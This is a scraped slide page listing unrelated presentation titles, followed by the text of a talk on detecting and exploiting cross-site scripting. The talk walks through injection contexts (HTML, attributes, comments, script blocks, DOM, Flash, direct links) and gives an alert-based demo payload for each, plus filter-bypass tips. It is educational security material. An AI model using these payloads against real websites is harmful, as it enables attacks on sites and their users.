Mobile App Development Company in Saudi ArabiaMobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi Arabia
Steve Jonas
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
Linux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdfLinux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdf
RHCSA Guru
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
organizerofv
 
Into The Box Conference Keynote Day 1 (ITB2025)
Into The Box Conference Keynote Day 1 (ITB2025)Into The Box Conference Keynote Day 1 (ITB2025)
Into The Box Conference Keynote Day 1 (ITB2025)
Ortus Solutions, Corp
 
What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...
Vishnu Singh Chundawat
 
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
Cyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of securityCyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of security
riccardosl1
 
Big Data Analytics Quick Research Guide by Arthur Morgan
Big Data Analytics Quick Research Guide by Arthur MorganBig Data Analytics Quick Research Guide by Arthur Morgan
Big Data Analytics Quick Research Guide by Arthur Morgan
Arthur Morgan
 
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Aqusag Technologies
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?
Daniel Lehner
 
Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.
hpbmnnxrvb
 
TrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business ConsultingTrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business Consulting
Trs Labs
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven InsightsAndrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell
 
Procurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptxProcurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptx
Jon Hansen
 
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath MaestroDev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
UiPathCommunity
 
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc
 

How To Detect Xss

  • 2. How to detect and exploit %99 of XSS Vulnerabilities
  • 3. XSS? So What? Recently XSS has proven to be dangerous enough to consider. And it allows you to jump into VPN or it allows you to bypass firewall rules via XSS Tunnelling.
  • 4. What is it about? It’s all about where output goes… Straight into HTML Into Javascript / VbScript block As tag attribute And some other rare, strange places…
  • 5. Understanding exploiting XSS It’s like SQL injection but now our subsystem is not a database it’s a browser and instead of a single quote we’ve got some new meta characters.
  • 6. Ultimate Challenge Ultimate challenge of XSS issues is able to escape current block and make browsers render your piece of code.
  • 7. XSS Types These are most common XSS examples which you are going to see in the wild. I’ll try to show a demo to exploit them. HTML – Normal HTML – Attribute without quotes HTML – Attribute with single quotes HTML – In Comments HTML – In Javascript Blocks DOM based XSS Flash based XSS Direct Linking
  • 8. Not Covered Before jumping into exploiting these specific issues; Following rare but has seen concepts are not covered in this talk. XAS – Cross Application Scripting Security Zones of IE Client-Site issues like .jar problem Advanced Flash Analyzes for XSS Exploiting XSS in real world Bypassing HTML parsing based XSS filters like gmail, myspace etc.
  • 9. HTML - Normal Most common XSS type, At least it was the most common one. But nowadays most of the developers aware of it. In this demo we assumed there is no filtering in the server-side.
  • 10. HTML - Normal DEMO <script>alert(0x1)</script>
  • 11. HTML – Attributes without Quotes When output used as an HTML attribute in the application, if it’s coded in a sloppy HTML which has no quotes around it even if there is a server-side filtering we can bypass it!
  • 12. HTML – Attributes without Quotes DEMO %20 onload=alert(0x2) %20
  • 13. HTML – Attributes with Single Quotes Wrapping HTML attributes with a single quote is quite common, valid but a poor practice. Since single quote is not considered as HTML meta character is not encoded by any of default XSS filter functions like html_entities() or Server.HTMLEncode()‏
  • 14. HTML –Attributes with Single Quotes DEMO ’ onload=alert(0x3)‏
  • 15. HTML – In Comments If output goes into an HTML comment we need “>” closing tag. This will be encoded by default filters, so it should be unfiltered.
  • 16. HTML – In Comments DEMO --!><script>alert(0x4)</script>
  • 17. HTML – Javascript Blocks Javascript blocks are too dangerous because meta characters are changing in there. If output goes into javascript we are not tag opener any more or double quotes. It all depends where it goes in Javascript, we may need a single quote, may need a double quotes or maybe only a space or semi column.
  • 18. HTML – In Comments DEMO ;alert(0x5)‏
  • 19. HTML – DOM Based This is one of the most rare and hard to spot XSS types. You need a simple source code analyse over the script code. Most of DOM based XSS issues can not be identified by automated scanners ( to be honest non of them! )‏
  • 20. HTML – In Comments DEMO #alert(0x6)‏
  • 21. HTML – Flash Based XSS It’s being more and more popular There are several ways to see an XSS issue in Flash but most common ones Remote flash file loading Direct Linking Flash application generally load remote resources and if this resources can be controlled by parameters then it can be called directly and can be forced to call a remote malisious flash object.
  • 22. HTML – Flash Based XSS DEMO vuln.swf?player=http://example.com/xss.swf _getURL(‘javascript:alert(0x7)’)‏
  • 23. HTML – Direct Linking If linking functionality exist almost, always vulnerable to this attack! It can be something like Your e-mail address Homepage URL Your photo URL etc….
  • 24. HTML – Flash Based XSS DEMO javascript:alert(0x8)‏
  • 25. Final Words If a XSS issue is exploitable in Internet Explorer it’s highly possibly exploitable in Mozilla based browser, attack vector may differs . CSS expression() and –moz-binding can allow you to trigger XSS payloads onload
  • 26. Final Words Know what you send… Your browser can do some encoding which may invalidate your XSS test To able to exploit target server you may need to send HTML characters without proper encoding Confirm what you send from your proxy and be sure you tested it with encoding and without encoding